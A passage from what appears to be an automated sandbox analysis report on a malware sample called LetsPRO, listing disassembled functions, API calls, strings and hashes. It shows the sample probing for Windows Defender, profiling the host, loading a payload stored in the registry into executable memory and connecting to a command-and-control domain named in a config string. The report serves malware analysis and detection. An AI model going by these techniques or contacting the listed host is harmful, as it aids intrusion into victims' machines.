                                          • Part of subcall function 03F36050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03F36088
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                        • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                        • API String ID: 1221949200-1583895642
                                        • Opcode ID: 7f78b4e8cb86dff3af61cb6dbb9f1a0b42771250f7a0f88967c51211f8ae9e81
                                        • Instruction ID: eddedacc5231bc6fbf33f5488c8aba5c443eb99f89e8725e46a68cab037ae289
                                        • Opcode Fuzzy Hash: 7f78b4e8cb86dff3af61cb6dbb9f1a0b42771250f7a0f88967c51211f8ae9e81
                                        • Instruction Fuzzy Hash: FA8173B1A00229AFDB20DB54CC91FAEB7B8EB49704F0445D8F719A7155D7B4AE80CFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004012C0 Relevance: 23.3, APIs: 2, Strings: 11, Instructions: 571memorylibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(000040B9,ABACE041,00003000,00000004,?,?,?), ref: 00401654
                                        • LoadLibraryA.KERNEL32(?), ref: 004019C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocLibraryLoadVirtual
                                        • String ID: @2@$GetM$GetP$Load$RtlM$Virt$ddre$eNam$odul$ualA$ualF
                                        • API String ID: 3550616410-2332390775
                                        • Opcode ID: 284b01f6618e40d9474911e63141fe03f15bdc035b349e916aed1a27081ceff0
                                        • Instruction ID: 87e66fb729c98852f49bd30e70b2d89e39bb07d99bac907f207390802af119ca
                                        • Opcode Fuzzy Hash: 284b01f6618e40d9474911e63141fe03f15bdc035b349e916aed1a27081ceff0
                                        • Instruction Fuzzy Hash: C1327B716043419FCB24CF18C884A2AB7F1FF94314F15856EE499AB3A1D778E985CF8A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F37490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryW.KERNEL32(ntdll.dll,75A773E0,?,?,?,03F35611,0000035E,000002FA), ref: 03F3749C
                                        • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 03F374B2
                                        • swprintf.LIBCMT ref: 03F374EF
                                          • Part of subcall function 03F37410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03F37523), ref: 03F3743D
                                          • Part of subcall function 03F37410: GetProcAddress.KERNEL32(00000000), ref: 03F37444
                                          • Part of subcall function 03F37410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03F37523), ref: 03F37452
                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03F37547
                                        • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03F37563
                                        • RegCloseKey.ADVAPI32(000002FA), ref: 03F37586
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,03F35611,0000035E,000002FA), ref: 03F37598
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                        • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                        • API String ID: 2158625971-3190923360
                                        • Opcode ID: d042e110840a5d282053e79d008fbf5aefc8b179646179c16aaab11a7223d078
                                        • Instruction ID: 3c449f6a290355449873eb1452abbd4aa4719aee25fb3513ab2c452938d22ce4
                                        • Opcode Fuzzy Hash: d042e110840a5d282053e79d008fbf5aefc8b179646179c16aaab11a7223d078
                                        • Instruction Fuzzy Hash: 7A31B4B6A41309BFDB18EBA4CD45FAFBB7CDF49740F140519BB0AA6145EA70DA04C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDriveTypeW.KERNEL32(?,7591DF80,00000000,75A773E0), ref: 03F36C8B
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03F36CAA
                                        • _memset.LIBCMT ref: 03F36CE1
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 03F36CF4
                                        • swprintf.LIBCMT ref: 03F36D39
                                        • swprintf.LIBCMT ref: 03F36D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                        • String ID: %sFree%d Gb $:$@$HDD:%d
                                        • API String ID: 3202570353-3501811827
                                        • Opcode ID: e22cd2ef7cd78af0edf146e1fbf44b791f5732f3d3b6f0938ec97ba6494e1a7d
                                        • Instruction ID: 5050a3942366fce1d55dda43af2adae64ee5633bde3e4ccbf7437c06c54ed577
                                        • Opcode Fuzzy Hash: e22cd2ef7cd78af0edf146e1fbf44b791f5732f3d3b6f0938ec97ba6494e1a7d
                                        • Instruction Fuzzy Hash: 04315EB6E0030CABDB14DFE5CC55BEEB7B9FB49700F50421DEA1AA7241D6746905CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDXGIFactory.DXGI(03F5579C,?,1A93E2E0,7591DF80,00000000,75A773E0), ref: 03F36F4A
                                        • swprintf.LIBCMT ref: 03F3711E
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F371C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                        • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                        • API String ID: 3803070356-257307503
                                        • Opcode ID: 4ec8e0a8782fa88534a7449d5173bd4eeae121f944e52ba11dd7768e7c1e7fbc
                                        • Instruction ID: a9c829b88efd530bec0cae52cc28a7dc2b9b07f4d3b9821c454ad1a70fff4b3a
                                        • Opcode Fuzzy Hash: 4ec8e0a8782fa88534a7449d5173bd4eeae121f944e52ba11dd7768e7c1e7fbc
                                        • Instruction Fuzzy Hash: F6E165B1E002259FDF24DE64CC80BEEB375EF46700F1446E9E959A7284D770AE858F91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 03F3607C
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03F36088
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 03F360B9
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 03F3610F
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03F36116
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                        • String ID:
                                        • API String ID: 2526126748-0
                                        • Opcode ID: 1210abfef54a925ab639dea135bd4422037d6da441185c233d2751c74b38d14d
                                        • Instruction ID: 9cd4e02d5b4a73dbc798e84776e78b76414a40f70e5f2ec5cb14f3743fc43255
                                        • Opcode Fuzzy Hash: 1210abfef54a925ab639dea135bd4422037d6da441185c233d2751c74b38d14d
                                        • Instruction Fuzzy Hash: 27210571A00219BBDB20FF74DC96BEAB3A8EF1A710F040699DD0AD7180EB319A05C650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F3330 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Time_memmovetime
                                        • String ID:
                                        • API String ID: 1463837790-0
                                        • Opcode ID: a9c97c26700ec1fb38f1f682dead8b5b38b6e431afc51f242176c2cd91c66951
                                        • Instruction ID: a740c129aa4ac43de60c95431df4ee6f5b5e5ad24402f5ccba2943665893edf8
                                        • Opcode Fuzzy Hash: a9c97c26700ec1fb38f1f682dead8b5b38b6e431afc51f242176c2cd91c66951
                                        • Instruction Fuzzy Hash: 2F510872700642AFE751DF69C8C8A6ABBA6FF8431471486ACDA19CB700D731FC41CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401244 Relevance: 3.0, APIs: 2, Instructions: 27memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,?,?,004011A7,00000000,?,?,00401054), ref: 0040124F
                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00000000,?,?,?,004011A7,00000000,?,?,00401054), ref: 0040127F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Heap$AllocateProcess
                                        • String ID:
                                        • API String ID: 1357844191-0
                                        • Opcode ID: d18f0155673e6dd6d57614b3c1d18179f393f220fe4cb60c32735651ae6b723f
                                        • Instruction ID: 3a122356888ca125531bc0c5e5f2dd309c0a3efcccc452154f43f17ddaa41462
                                        • Opcode Fuzzy Hash: d18f0155673e6dd6d57614b3c1d18179f393f220fe4cb60c32735651ae6b723f
                                        • Instruction Fuzzy Hash: C4F0C930C4060CEBDB10AFA0FA09AADBF74FF59302F5190A4E944B61A4DB318A34D759
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F5E30 Relevance: 52.7, APIs: 5, Strings: 25, Instructions: 186registryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • _memset.LIBCMT ref: 025F5E61
                                          • Part of subcall function 025F5D60: lstrlenW.KERNEL32(000012A0,?,?,?,?,?,025F5E77,p1:,0260C6FE,00000000,0260C6E0,00000000,000012A0,|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:), ref: 025F5D78
                                          • Part of subcall function 025F5D60: _memset.LIBCMT ref: 025F5D82
                                          • Part of subcall function 025F5D60: lstrlenW.KERNEL32(|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:,?,?,?,?,?,025F5E77,p1:,0260C6FE,00000000,0260C6E0,00000000,000012A0,|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:), ref: 025F5D8F
                                          • Part of subcall function 025F5D60: lstrlenW.KERNEL32(?,?,?,?,?,?,025F5E77,p1:,0260C6FE,00000000,0260C6E0,00000000,000012A0,|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:), ref: 025F5D97
                                        • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 025F600B
                                        • RegQueryValueExW.KERNEL32(?,IpDate,00000000,00000003,00000000,00000000), ref: 025F6030
                                        • _memset.LIBCMT ref: 025F6048
                                        • RegQueryValueExW.ADVAPI32(?,IpDate,00000000,00000003,|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:,0000000A), ref: 025F6068
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memsetlstrlen$QueryValue$Open
                                        • String ID: Console$IpDate$bb:$bd:$bh:$bz:$cl:$dd:$dl:$fz:$jp:$kl:$ll:$o1:$o2:$o3:$p1:$p2:$p3:$sh:$sx:$t1:$t2:$t3:$|p1:127.0.0.1|o1:80|t1:1|p2:hm2.webcamcn.xyz|o2:443|t2:1|p3:hm2.webcamcn.xyz|o3:80|t3:0|dd:1|cl:1|fz:
                                        • API String ID: 3278200350-2478570363
                                        • Opcode ID: 3b013de37ebe0acb58445a7729a740f8dd8a924fbb14333e18cee4e67b7d05bc
                                        • Instruction ID: 9b6ab85285e8d45f8c69968f17a2209b8f283f05e16d37a04219c4ff88b777f8
                                        • Opcode Fuzzy Hash: 3b013de37ebe0acb58445a7729a740f8dd8a924fbb14333e18cee4e67b7d05bc
                                        • Instruction Fuzzy Hash: FE51E7B5BD130A79F57A72A48C8BF4FBF156B50F01FA40242B707B90C1A9E03605B96E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F54C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 025F5507
                                        • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 025F552E
                                        • _memset.LIBCMT ref: 025F5548
                                        • RegQueryValueExW.ADVAPI32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000003), ref: 025F5563
                                        • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 025F5586
                                        • RegCloseKey.ADVAPI32(?), ref: 025F55B1
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 025F5605
                                        • _memset.LIBCMT ref: 025F5669
                                        • _memset.LIBCMT ref: 025F568D
                                        • _memset.LIBCMT ref: 025F569F
                                        • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 025F5726
                                        • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 025F5799
                                        • RegDeleteValueW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059), ref: 025F57AC
                                        • RegSetValueExW.KERNEL32(?,d33f351a4aeea5e608853d1a56661059,00000000,00000003,00000000,00000065), ref: 025F57C4
                                        • RegCloseKey.ADVAPI32(?), ref: 025F57CE
                                        • Sleep.KERNEL32(00000BB8), ref: 025F57FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                        • String ID: !jWW$.$29e63e83392895a08a0855578b853682$Console\0$_$d33f351a4aeea5e608853d1a56661059$e$i$l${vU_
                                        • API String ID: 354323817-2418287668
                                        • Opcode ID: af45406f133bdae4f98fb0ad5d6bc7ab71d0db88a6369d93a19a27fd1b1604a2
                                        • Instruction ID: c6a224ed21ab0a180ee76d60e705a7387edbfb08d16a7a7cf2c6d55f71af262e
                                        • Opcode Fuzzy Hash: af45406f133bdae4f98fb0ad5d6bc7ab71d0db88a6369d93a19a27fd1b1604a2
                                        • Instruction Fuzzy Hash: 8291B575A40308ABE720DF60DC84FAF7BBAFB85714F508559FA099B244E7B0AA40CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F2D70 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • ResetEvent.KERNEL32(?), ref: 025F2D8B
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 025F2D97
                                        • timeGetTime.WINMM ref: 025F2D9D
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 025F2DCA
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 025F2DF6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 025F2E02
                                        • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 025F2E21
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 025F2E2D
                                        • gethostbyname.WS2_32(00000000), ref: 025F2E3B
                                        • htons.WS2_32(?), ref: 025F2E5D
                                        • connect.WS2_32(?,?,00000010), ref: 025F2E7B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                        • String ID: 0u
                                        • API String ID: 640718063-3203441087
                                        • Opcode ID: bc4723113b74d3c7e43063b63e906564508a2dd33b130545ecf3ea1278b13032
                                        • Instruction ID: c3fcf43bb31ba941a4cd2a492d4c3b58903c0dc17b0bbc8eaedeb9c8390ec0b3
                                        • Opcode Fuzzy Hash: bc4723113b74d3c7e43063b63e906564508a2dd33b130545ecf3ea1278b13032
                                        • Instruction Fuzzy Hash: C4612CB1A40304ABE720DFA4DC85FAFB7B9FF48710F504519FA46EB280D7B0A9448B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F32DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • ResetEvent.KERNEL32(?), ref: 03F32DBB
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 03F32DC7
                                        • timeGetTime.WINMM ref: 03F32DCD
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 03F32DFA
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03F32E26
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03F32E32
                                        • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03F32E51
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03F32E5D
                                        • gethostbyname.WS2_32(00000000), ref: 03F32E6B
                                        • htons.WS2_32(?), ref: 03F32E8D
                                        • connect.WS2_32(?,?,00000010), ref: 03F32EAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                        • String ID: 0u
                                        • API String ID: 640718063-3203441087
                                        • Opcode ID: 369f57328103b545f2b7e6f759b3d14e9afa84d2d98238f4c0798258dad709c5
                                        • Instruction ID: 83cf9b500afa6c0875e48b9d8dae3212bacf25b6904af4948b6f8f178f2f4a58
                                        • Opcode Fuzzy Hash: 369f57328103b545f2b7e6f759b3d14e9afa84d2d98238f4c0798258dad709c5
                                        • Instruction Fuzzy Hash: 83614171A40308BFD720EFA4DC45FABB7B8FF49710F104619F655AB290D6B0A9048B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 470 3f3ad10-3f3ad2b 471 3f3ad84-3f3ad8f 470->471 472 3f3ad2d-3f3ad5b RegOpenKeyExW 470->472 473 3f3b845-3f3b84b call 3f3ce00 471->473 474 3f3ad95-3f3ad9c 471->474 475 3f3ad79-3f3ad7e 472->475 476 3f3ad5d-3f3ad73 RegQueryValueExW 472->476 477 3f3b84e-3f3b854 473->477 478 3f3afe3-3f3b09b call 3f3f707 call 3f46770 call 3f3eff4 call 3f47660 call 3f3f707 call 3f3cf20 call 3f3eff4 474->478 479 3f3adea-3f3adf1 474->479 475->471 475->477 476->475 528 3f3b162-3f3b189 call 3f3fa29 CloseHandle 478->528 529 3f3b0a1-3f3b0ee call 3f47660 RegCreateKeyW 478->529 479->477 481 3f3adf7-3f3ae29 call 3f3f707 call 3f46770 479->481 493 3f3ae42-3f3ae4e 481->493 494 3f3ae2b-3f3ae3f wsprintfW 481->494 496 3f3ae50 493->496 497 3f3ae9a-3f3aef1 call 3f3eff4 call 3f47660 call 3f32ba0 call 3f3efff * 2 493->497 494->493 500 3f3ae54-3f3ae5f 496->500 503 3f3ae60-3f3ae66 500->503 506 3f3ae86-3f3ae88 503->506 507 3f3ae68-3f3ae6b 503->507 508 3f3ae8b-3f3ae8d 506->508 511 3f3ae82-3f3ae84 507->511 512 3f3ae6d-3f3ae75 507->512 514 3f3aef4-3f3af09 508->514 515 3f3ae8f-3f3ae98 508->515 511->508 512->506 513 3f3ae77-3f3ae80 512->513 513->503 513->511 518 3f3af10-3f3af16 514->518 515->497 515->500 521 3f3af36-3f3af38 518->521 522 3f3af18-3f3af1b 518->522 527 3f3af3b-3f3af3d 521->527 525 3f3af32-3f3af34 522->525 526 3f3af1d-3f3af25 522->526 525->527 526->521 531 3f3af27-3f3af30 526->531 532 3f3af3f-3f3af41 527->532 533 3f3afae-3f3afe0 call 3f3fa29 CloseHandle call 3f3efff 527->533 547 3f3b0f0-3f3b13f call 3f3eff4 call 3f35a30 RegDeleteValueW RegSetValueExW 529->547 548 3f3b14a-3f3b15f RegCloseKey call 3f3fac9 529->548 531->518 531->525 538 3f3af43-3f3af4e call 3f3efff 532->538 539 3f3af55-3f3af5c 532->539 538->539 545 3f3af70-3f3af74 539->545 546 3f3af5e-3f3af69 call 3f3fac9 539->546 549 3f3af76-3f3af7f call 3f3efff 545->549 550 3f3af85-3f3afa9 call 3f3f020 545->550 546->545 547->548 566 3f3b141-3f3b147 call 3f3fac9 547->566 548->528 549->550 550->497 566->548
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 03F3AD53
                                        • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 03F3AD73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: OpenQueryValue
                                        • String ID: %s_bin$Console$Console\0$IpDatespecial
                                        • API String ID: 4153817207-1338088003
                                        • Opcode ID: 9bff7920ff5176ee05d572e270c384f6160ceb5652a2a0d74f6fee54149ed3f3
                                        • Instruction ID: 0dbec117f6f86b60b6d34db40acdacf11e92a5326b31fa1c0264d73d06e1691e
                                        • Opcode Fuzzy Hash: 9bff7920ff5176ee05d572e270c384f6160ceb5652a2a0d74f6fee54149ed3f3
                                        • Instruction Fuzzy Hash: A2C117B6A00301ABE710EF25DC41F6B73A8EF96714F080568F9899B281E775E905C7A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F35F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • CreateMutexW.KERNEL32(00000000,00000000,2024. 4.23), ref: 03F35F66
                                        • GetLastError.KERNEL32 ref: 03F35F6E
                                        • Sleep.KERNEL32(000003E8), ref: 03F35F85
                                        • CreateMutexW.KERNEL32(00000000,00000000,2024. 4.23), ref: 03F35F90
                                        • GetLastError.KERNEL32 ref: 03F35F92
                                        • _memset.LIBCMT ref: 03F35FB9
                                        • lstrlenW.KERNEL32(?), ref: 03F35FC6
                                        • lstrcmpW.KERNEL32(?,03F55328), ref: 03F35FED
                                        • Sleep.KERNEL32(000003E8), ref: 03F35FF8
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 03F36005
                                        • GetConsoleWindow.KERNEL32 ref: 03F3600F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                        • String ID: 2024. 4.23$key$open
                                        • API String ID: 2922109467-1541589875
                                        • Opcode ID: cdde854ffd0bd978984cb919dcebce40d9082dbeb4d2f157c603663406c95274
                                        • Instruction ID: e1ab6f393015a589c853a0f484c3e04fabcecfe9acce613cdb95895b3e6188ab
                                        • Opcode Fuzzy Hash: cdde854ffd0bd978984cb919dcebce40d9082dbeb4d2f157c603663406c95274
                                        • Instruction Fuzzy Hash: 3121297294430AABD614EB74EC45F5E7398EB95700F140929FB08D71D4DB70E609CBA3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F362B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
